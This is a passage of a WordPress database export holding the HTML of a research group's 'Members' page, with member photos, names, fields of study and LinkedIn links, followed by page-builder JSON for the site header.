h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c185 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c186\" class=\"d-block style-913 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c186-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c186-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c187\" class=\"h-global-transition-all h-heading style-914 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c187\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-text h-text-component style-915 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"style-917 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c190-outer\">\n            <div data-colibri-id=\"182-c190\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c190 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c191\" class=\"d-block style-913 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c191-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c191-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c192\" class=\"h-global-transition-all h-heading style-914 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c192\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-text h-text-component style-915 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"style-917 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c195 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-913 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-914 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-915 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c199-outer\">\n            <div data-colibri-id=\"182-c199\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c199 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c200\" class=\"d-block style-913 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c200-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c200-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c201\" class=\"h-global-transition-all h-heading style-914 style-local-182-c201 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c201\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c202\" class=\"h-text h-text-component style-915 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"style-917 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c204-outer\">\n            <div data-colibri-id=\"182-c204\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c204 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c205\" class=\"d-block style-913 style-local-182-c205 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c205-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c205-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c206\" class=\"h-global-transition-all h-heading style-914 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c206\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-text h-text-component style-915 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"style-917 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-13 10:00:15','2023-10-13 14:00:15','',182,'https://gsudice.dataconn.net/?p=1735',0,'revision','',0),(1736,1,'2023-10-13 10:00:15','2023-10-13 14:00:15','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"navigation\":{\"background\":{\"color\":\"transparent\"}}}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h5\",\"parentId\":\"25-h4\",\"partialId\":25,\"styleRef\":38,\"type\":\"header\"}],\"id\":\"25-h4\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":37,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"children\":[{\"name\":\"hop-spacer\",\"slot\":null,\"parentId\":\"25-h6\",\"index\":0,\"id\":\"25-h7\",\"partialId\":25,\"styleRef\":40,\"type\":\"header\"}],\"id\":\"25-h6\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":39,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":\"86.16\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}},\"ancestor\":{\"sticky\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"25-h15\",\"parentId\":\"25-h14\",\"partialId\":25,\"styleRef\":47,\"type\":\"header\"}],\"id\":\"25-h14\",\"parentId\":\"25-h13\",\"partialId\":25,\"styleRef\":46,\"type\":\"header\"}],\"id\":\"25-h13\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":45,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"children\":[{\"name\":\"hop-column\",\"props\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}},\"id\":\"25-h17\",\"parentId\":\"25-h16\",\"partialId\":25,\"styleRef\":49,\"type\":\"header\"}],\"id\":\"25-h16\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":48,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"25-h12\",\"parentId\":\"25-h11\",\"partialId\":25,\"styleRef\":50,\"type\":\"header\"}],\"id\":\"25-h11\",\"parentId\":\"25-h10\",\"partialId\":25,\"styleRef\":44,\"type\":\"header\"}],\"id\":\"25-h10\",\"parentId\":\"25-h9\",\"partialId\":25,\"styleRef\":43,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\",\"priority\":1}},\"parentId\":\"25-h8\",\"index\":1,\"id\":\"25-h9\",\"partialId\":25,\"styleRef\":42,\"type\":\"header\"}],\"id\":\"25-h8\",\"parentId\":\"25-h3\",\"partialId\":25,\"styleRef\":41,\"type\":\"header\"}],\"id\":\"25-h3\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":36,\"type\":\"header\"}],\"parentId\":\"25-h1\",\"id\":\"25-h2\",\"partialId\":25,\"styleRef\":35,\"type\":\"header\",\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/twitter.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"http:\\/\\/maps.google.com\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":54,\"slot\":null,\"parentId\":\"25-h20\",\"index\":0,\"id\":\"25-h21\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h20\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":53,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"#\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":56,\"slot\":null,\"parentId\":\"25-h22\",\"index\":0,\"id\":\"25-h23\",\"partialId\":25,\"type\":\"header\"}],\"id\":\"25-h22\",\"parentId\":\"25-h19\",\"partialId\":25,\"styleRef\":55,\"type\":\"header\"}],\"id\":\"25-h19\",\"parentId\":\"25-h18\",\"partialId\":25,\"styleRef\":52,\"type\":\"header\"}],\"id\":\"25-h18\",\"parentId\":\"25-h2\",\"partialId\":25,\"styleRef\":51,\"type\":\"header\"}]}},{\"name\":\"hop-hero\",\"props\":{\"anchor\":false,\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-page-title\",\"id\":\"25-h27\",\"parentId\":\"25-h26\",\"partialId\":25,\"styleRef\":60,\"type\":\"header\"}],\"id\":\"25-h26\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":59,\"type\":\"header\"},{\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"25-h28\",\"parentId\":\"25-h25\",\"partialId\":25,\"styleRef\":278,\"type\":\"header\"}],\"parentId\":\"25-h24\",\"index\":0,\"id\":\"25-h25\",\"partialId\":25,\"styleRef\":58,\"type\":\"header\"}],\"pa